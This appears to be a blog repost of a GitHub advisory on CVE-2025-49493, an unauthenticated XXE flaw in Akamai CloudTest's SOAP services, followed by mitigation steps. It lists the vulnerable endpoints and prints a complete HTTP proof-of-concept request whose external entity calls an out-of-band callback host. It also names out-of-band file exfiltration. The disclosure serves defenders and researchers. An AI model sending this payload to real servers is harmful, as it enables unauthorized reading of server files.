Akamai CloudTest XXE Injection Vulnerability

漏洞信息

漏洞名称: Akamai CloudTest XXE Injection Vulnerability

漏洞编号:

  • CVE: CVE-2025-49493

漏洞类型: XML实体注入

漏洞等级: 中危

漏洞描述: Akamai CloudTest是一款广泛使用的云测试平台,主要用于企业级服务的性能测试和安全评估。该平台通过模拟大量用户请求来测试Web应用和服务的稳定性和安全性,因此在企业和服务提供商中非常受欢迎。此次发现的XXE注入漏洞影响了版本60(构建12988)之前的所有Akamai CloudTest实例。

该漏洞属于XML外部实体注入(XXE)类型,其技术根源在于Akamai CloudTest在处理SOAP请求时,未能正确限制XML解析器对外部实体的处理。攻击者可以通过构造恶意的XML请求,利用SOAP端点(如/concerto/services/RepositoryService等)注入外部DTD,进而读取服务器上的本地文件内容。这种攻击不需要任何形式的认证或用户交互,使得风险大大增加。

从影响分析来看,此漏洞可能导致严重的安全风险,包括但不限于敏感信息泄露(如读取/etc/passwd文件)、服务器配置暴露等。由于攻击者可以远程利用此漏洞,且无需认证,因此该漏洞的潜在危害范围广泛,尤其是在未及时打补丁的环境中。此外,攻击者还可能利用此漏洞进行进一步的网络渗透,如利用泄露的信息进行更有针对性的攻击。因此,建议所有使用Akamai CloudTest的企业和服务提供商立即升级到版本60或更高版本,以防范潜在的安全威胁。

产品厂商: Akamai

产品名称: Akamai CloudTest

影响版本: version < 60 (build 12988)

来源: https://github.com/B1ack4sh/Blackash-CVE-2025-49493

类型: CVE-2025:github search

仓库文件

  • README.md

来源概述

CVE-2025-49493 Akamai CloudTest - XXE Injection

📄 Description:

Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.

🛠️ Basic Information:

  • Affected Product: Akamai CloudTest (prior to version 60 — build 12988, released June 2025)
  • Vulnerability Type: XML External Entity Injection (XXE)
  • CWE: CWE‑611 – Improper Restriction of XML External Entity
  • Impact: Remote attackers can send crafted XML to read local files on the server without authentication or user interaction.

🔍 Technical Details:

  • Vulnerable SOAP endpoints include:
1
2
3
4
/concerto/services/RepositoryService
/concerto/services/CollectorService
/concerto/services/Concerto
/concerto/services/SampleService
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
POST //concerto/services/RepositoryService HTTP/1.1
Host: readacted.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (******; **** *** ** X 10_15_7) **********/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 *****/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 610

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://b6it5hei11vmt9as2lbg98h4gvmrahy6.oastify.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>
  • The flaw allows attackers to inject external DTDs (Document Type Definitions) and exploit XML parsers to leak local file content.
  • Techniques such as error-based parsing and out-of-band (OOB) data exfiltration can be used.

📊 Severity:

  • CVSS v3.1 Score: 5.8 (Medium 🟠)
  • Attack Vector: Network
  • Privileges Required: None
  • User Interaction: None
  • Impact: Confidentiality breach (e.g., reading /etc/passwd)

✅ Mitigation Steps:

  1. Update to CloudTest version 60 or later, where external entity parsing is disabled by default.
  2. Disable DTD processing in XML parsers manually if an upgrade isn’t possible.
  3. Restrict network access to CloudTest instances (e.g., via firewalls and IP allowlists).
  4. Monitor XML traffic for anomalies or known exploit patterns.
  5. Limit file access permissions for the CloudTest service to reduce impact.
  6. Deploy a WAF (Web Application Firewall) with rules against XXE attacks.

📅 Timeline:

  • Vulnerability discovered: June 2025
  • Fix released: Early July 2025
  • Proof of Concept (PoC) exists publicly.
  • No confirmed mass exploitation as of now.

✅ Summary Table:

Field Details
Product Akamai CloudTest < v60
CVSS Score 5.8 (Medium)
Exploitable Remotely, no auth required
Affected Feature XML SOAP services
Attack Technique XXE via external DTDs
Patch Available in version 60 (June 2025)
Risk Disclosure of sensitive files

⚠️ Disclaimer:

This PoC is provided for educational and research purposes only. Running this on any system without permission is illegal and unethical !!!

Github Poc
#CVE-2025:github search #XML实体注入
Akamai CloudTest XXE Injection Vulnerability
http://example.com/2025/07/05/github_1717591136/
作者
lianccc
发布于
2025年7月5日
许可协议